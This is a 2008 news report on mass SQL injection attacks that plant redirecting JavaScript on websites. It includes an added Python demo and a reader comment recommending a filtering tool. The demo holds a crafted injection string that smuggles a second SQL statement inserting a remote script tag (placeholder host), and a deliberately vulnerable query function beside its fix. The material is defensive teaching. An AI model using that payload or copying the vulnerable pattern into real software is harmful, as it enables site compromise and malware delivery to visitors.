20 May 2008
Security experts have warned that the recent rash of large-scale website attacks may not be a fleeting trend.
McAfee researcher Craig Schmugar believes that the attacks, which simultaneously target hundreds of thousands of web pages, could be a sign of things to come.
The nature of the attacks makes them very hard to prevent, and simply removing the exploit code may not protect sites from further infection.
"The bad guys are using automated tools to find and attack web applications that are vulnerable to SQL injection attacks," said Schmugar.
"Many of these applications are home grown and thus there is no patch or hotfix for administrators to install."
Schmugar's grim assessment follows several SQL injection attacks in recent months. The attackers are believed to have used automated scripts to run input-validation attacks on pages.
The script embeds a small section of JavaScript on the compromised page. Users attempting to access the pages are silently routed to a third-party site run by the attacker.
This page then attempts to execute a number of browser exploits in an effort to install malware.
Schmugar explained that the problem could be solved by updating pages to prevent the attacks, but that a fix will not be easy to come by.
"The entry point for these attacks must be closed in order to thwart future attacks. This means that underlying code must be audited and improper input-validation must be corrected," he said.
"Given that many web administrators install out-of-support freeware and shareware applications, we can expect many sites to remain vulnerable for a long time."
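The point made above, that cleaning the injected script leaves a site open to re-infection until the input handling itself is corrected, is shown here as an added example (not code from the article or from McAfee). It uses an in-memory SQLite table; the table, the function names and the placeholder host are assumptions, and `executescript` stands in for a database driver that runs every statement it is handed.

```python
import sqlite3

# Constructed input: a page id followed by a second statement that appends a
# script tag (placeholder host) to every stored title.
INJECTED_TAG = '<script src="http://injected.example/x.js"></script>'
CRAFTED_ID = "1; UPDATE articles SET title = title || '" + INJECTED_TAG + "'"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, views INTEGER DEFAULT 0)")
    conn.executemany("INSERT INTO articles (id, title) VALUES (?, ?)", [(1, "Home"), (2, "Contact")])
    return conn

def record_view_vulnerable(conn, article_id):
    # Request value concatenated into the SQL text; executescript stands in
    # for a driver that runs every statement it receives.
    conn.executescript("UPDATE articles SET views = views + 1 WHERE id = " + article_id)

def record_view_fixed(conn, article_id):
    # Corrected input validation: accept plain ASCII digits only, then bind
    # the value as a parameter so it can never become SQL text.
    if not (article_id.isascii() and article_id.isdigit()):
        return False
    conn.execute("UPDATE articles SET views = views + 1 WHERE id = ?", (int(article_id),))
    return True

def infected_rows(conn):
    return conn.execute("SELECT COUNT(*) FROM articles WHERE title LIKE '%<script%'").fetchone()[0]

def clean(conn):
    # Removes the injected markup only, as a site owner restoring pages would.
    conn.execute("UPDATE articles SET title = replace(title, ?, '')", (INJECTED_TAG,))

def demo():
    conn = make_db()
    record_view_vulnerable(conn, CRAFTED_ID)
    first = infected_rows(conn)         # every title now carries the tag
    clean(conn)
    after_clean = infected_rows(conn)   # pages look fine again
    record_view_vulnerable(conn, CRAFTED_ID)
    again = infected_rows(conn)         # same entry point, same outcome
    clean(conn)
    accepted = record_view_fixed(conn, CRAFTED_ID)
    return first, after_clean, again, accepted, infected_rows(conn)

if __name__ == "__main__":
    print(demo())
```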
There is a solution for administrators
If you take the time to configure it correctly and make sure that it doesn't break your web application(s), Aqtronix Webknight is a great way to block these attacks. Essentially, it filters out injection keywords. If you end up using this software, just be aware that its default configuration is VERY VERY VERY strict and will likely block your entire site if you leave it at default. Installs as an ISAPI filter for IIS. Once it's configured right, it's nice to see these exploits being blocked :)
Posted by: A. 20 May 2008